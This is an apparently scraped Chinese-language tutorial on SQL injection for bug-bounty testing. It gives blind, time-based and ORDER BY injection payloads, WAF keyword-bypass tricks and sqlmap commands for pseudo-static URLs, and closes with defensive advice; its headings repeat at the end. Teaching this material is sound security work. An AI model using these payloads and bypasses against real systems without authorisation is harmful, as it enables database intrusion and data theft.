SQL注入综合教学与实战指南<\/h1>

0x1 前言<\/h2>
本文系统梳理SQL注入的判断技巧、实战案例及特殊场景利用方法，重点涵盖闭合方式判断、排序注入、关键字绕过和伪静态SQL注入等技术要点，结合EDU SRC实战案例进行深度解析。<\/p>

0x2 SQL注入判断技巧<\/h2>

一、SQL注入类型判断<\/h3>

数字型注入特征<\/h4>

参数直接参与SQL运算，无需引号包裹<\/li>
典型测试Payload：id=1 and 1=1<\/code> \/ id=1 and 1=2<\/code><\/li>

运算验证：id=2-1<\/code>（应返回与id=1相同结果）<\/li>
<\/ul>
字符型注入特征<\/h4>

参数由单引号或双引号包裹<\/li>
需先闭合引号再构造注入语句<\/li>
典型测试：id=1' and '1'='1<\/code> \/ id=1' and '1'='2<\/code><\/li>
<\/ul>
二、闭合方式猜测技术<\/h3>
系统化测试所有可能的闭合方式：<\/p>

单引号测试<\/strong>：'<\/code> → 观察是否报错<\/li>
双引号测试<\/strong>："<\/code> → 观察是否报错<\/li>
括号测试<\/strong>：)<\/code> \/ '))<\/code> \/ ")<\/code> 等组合<\/li>
注释符测试<\/strong>：配合--+<\/code> \/ #<\/code> \/ %23<\/code>尝试闭合<\/li>
<\/ol>
判断依据<\/strong>：<\/p>

页面返回正常 → 可能找到正确闭合方式<\/li>
报错信息 → 分析报错内容判断闭合方式<\/li>
页面空白\/异常 → 可能闭合方式错误<\/li>
<\/ul>
三、排序注入（Order By注入）<\/h3>
注入点特征<\/h4>

参数控制order<\/code> \/ sort<\/code>等排序字段<\/li>
使用关键字：DESC、desc、asc、order等<\/li>
<\/ul>
利用方法<\/h4>


正常排序测试<\/strong>：<\/p>
?<\/span>order<\/span>=<\/span>name_desc   #<\/span> 按<\/span>name降序<\/span>
<\/span><\/span>?<\/span>order<\/span>=<\/span>name_asc    #<\/span> 按<\/span>name升序<\/span>
<\/span><\/span><\/code><\/pre><\/li>

注入验证<\/strong>：<\/p>
?<\/span>order<\/span>=<\/span>(case<\/span> when<\/span> 1<\/span>=<\/span>1<\/span> then<\/span> name else<\/span> id end<\/span>)_desc
<\/span><\/span>?<\/span>order<\/span>=<\/span>(case<\/span> when<\/span> 1<\/span>=<\/span>2<\/span> then<\/span> name else<\/span> id end<\/span>)_desc
<\/span><\/span><\/code><\/pre><\/li>

盲注利用<\/strong>：<\/p>
?<\/span>order<\/span>=<\/span>(case<\/span> when<\/span> ascii(substr(database<\/span>(),1<\/span>,1<\/span>))><\/span>100<\/span> then<\/span> name else<\/span> id end<\/span>)_desc
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x3 EDU SRC实战案例<\/h2>
一、案例分享：基于if的SQL注入<\/h3>
漏洞特征<\/h4>

使用if()<\/code>函数判断数据库长度<\/li>
通过响应差异判断注入结果<\/li>
<\/ul>
利用过程<\/h4>


长度判断Payload<\/strong>：<\/p>
and<\/span> if<\/span>(length<\/span>(database<\/span>())=<\/span>8<\/span>,sleep(3<\/span>),1<\/span>)--
<\/span><\/span><\/span><\/code><\/pre>通过响应时间差异判断数据库名长度<\/p>
<\/li>

逐字符盲注<\/strong>：<\/p>
and<\/span> if<\/span>(ascii(substr(database<\/span>(),1<\/span>,1<\/span>))><\/span>100<\/span>,sleep(2<\/span>),1<\/span>)--
<\/span><\/span><\/span><\/code><\/pre><\/li>

数据提取<\/strong>：通过二分法逐个字符判断数据库名、表名、字段值<\/p>
<\/li>
<\/ol>
二、关键字绕过技术<\/h3>
常见过滤及绕过方式<\/h4>


空格过滤<\/strong> → 使用\/**\/<\/code>、%0a<\/code>、%0d<\/code>、%09<\/code>替代<\/p>
<\/li>

关键词过滤<\/strong> → 使用大小写变异、双写、注释分割：<\/p>
SEL\/*bypass*\/<\/span>ECT →<\/span> 绕过<\/span>SELECT过滤<\/span>
<\/span><\/span>uniON<\/span> selECT<\/span> →<\/span> 大小写绕过<\/span>
<\/span><\/span><\/code><\/pre><\/li>

等号过滤<\/strong> → 使用like<\/code>、rlike<\/code>、regexp<\/code>替代：<\/p>
and<\/span> 1<\/span> like<\/span> 1<\/span> →<\/span> 替代<\/span> 1<\/span>=<\/span>1<\/span>
<\/span><\/span><\/code><\/pre><\/li>

引号过滤<\/strong> → 使用十六进制编码：<\/p>
union<\/span> select<\/span> 1<\/span>,0<\/span>x6a6a6a →<\/span> 替代<\/span> 'jjj'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x4 伪静态SQL注入<\/h2>
特征识别<\/h3>

URL呈现静态化特征：.html<\/code>、.shtml<\/code>等后缀<\/li>
参数嵌入在路径中而非查询字符串<\/li>
示例URL：\/news\/123.html<\/code>（123为参数）<\/li>
<\/ul>
测试方法<\/h3>
手工测试<\/h4>

参数位置识别<\/strong>：确定URL中哪部分为动态参数<\/li>
闭合测试<\/strong>：在参数后添加测试Payload
\/news\/123'.html      → 测试单引号
\/news\/123)'.html     → 测试括号+单引号
\/news\/123) and 1=1.html
<\/code><\/pre>
<\/li>
<\/ol>
Sqlmap自动化测试<\/h4>


指定注入点<\/strong>：使用*<\/code>标记注入位置<\/p>
sqlmap -u "http:\/\/site.com\/news\/123*.html"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

后缀处理<\/strong>：使用--suffix<\/code>参数<\/p>
sqlmap -u "http:\/\/site.com\/news\/123"<\/span> --suffix=<\/span>".html"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

Level调整<\/strong>：提高检测级别<\/p>
sqlmap -u "http:\/\/site.com\/news\/123*.html"<\/span> --level=<\/span>3<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
利用技巧<\/h3>

注意URL编码：确保特殊字符正确编码<\/li>
观察重定向：伪静态可能涉及重定向规则<\/li>
错误信息利用：故意触发错误获取数据库信息<\/li>
<\/ul>
0x5 防御建议<\/h2>
开发层面<\/h3>

预编译语句<\/strong>：强制使用参数化查询<\/li>
输入过滤<\/strong>：严格校验输入数据类型和格式<\/li>
最小权限<\/strong>：数据库账户遵循最小权限原则<\/li>
错误处理<\/strong>：自定义错误信息，避免泄露细节<\/li>
<\/ol>
WAF层面<\/h3>

关键词检测<\/strong>：过滤常见SQL关键字和函数<\/li>
行为检测<\/strong>：识别异常查询模式和频率<\/li>
编码识别<\/strong>：检测各种编码形式的攻击载荷<\/li>
<\/ol>
运维层面<\/h3>

定期扫描<\/strong>：使用sqlmap等工具定期检测<\/li>
日志监控<\/strong>：监控异常数据库查询请求<\/li>
漏洞修复<\/strong>：建立快速响应和修复机制<\/li>
<\/ol>
总结<\/h2>
SQL注入作为最古老的Web漏洞之一，仍然在各种新型场景中出现。从传统的数字型\/字符型注入到排序注入、伪静态注入，攻击方式不断演变。防御方需要建立多层次防御体系，既要关注传统注入方式，也要警惕新型利用手法的出现。掌握系统化的测试方法和绕过技术，才能有效发现和修复SQL注入漏洞。<\/p>
注<\/strong>：本文仅用于安全教学和研究目的，任何实际测试请确保获得合法授权。<\/p>

SQL注入综合教学与实战指南<\/h1>

0x1 前言<\/h2> 本文系统梳理SQL注入的判断技巧、实战案例及特殊场景利用方法，重点涵盖闭合方式判断、排序注入、关键字绕过和伪静态SQL注入等技术要点，结合EDU SRC实战案例进行深度解析。<\/p>

0x2 SQL注入判断技巧<\/h2>

一、SQL注入类型判断<\/h3>

三、排序注入（Order By注入）<\/h3>

0x3 EDU SRC实战案例<\/h2>

一、案例分享：基于if的SQL注入<\/h3>

0x4 伪静态SQL注入<\/h2>

测试方法<\/h3>

0x5 防御建议<\/h2>

0x1 前言<\/h2>
本文系统梳理SQL注入的判断技巧、实战案例及特殊场景利用方法，重点涵盖闭合方式判断、排序注入、关键字绕过和伪静态SQL注入等技术要点，结合EDU SRC实战案例进行深度解析。<\/p>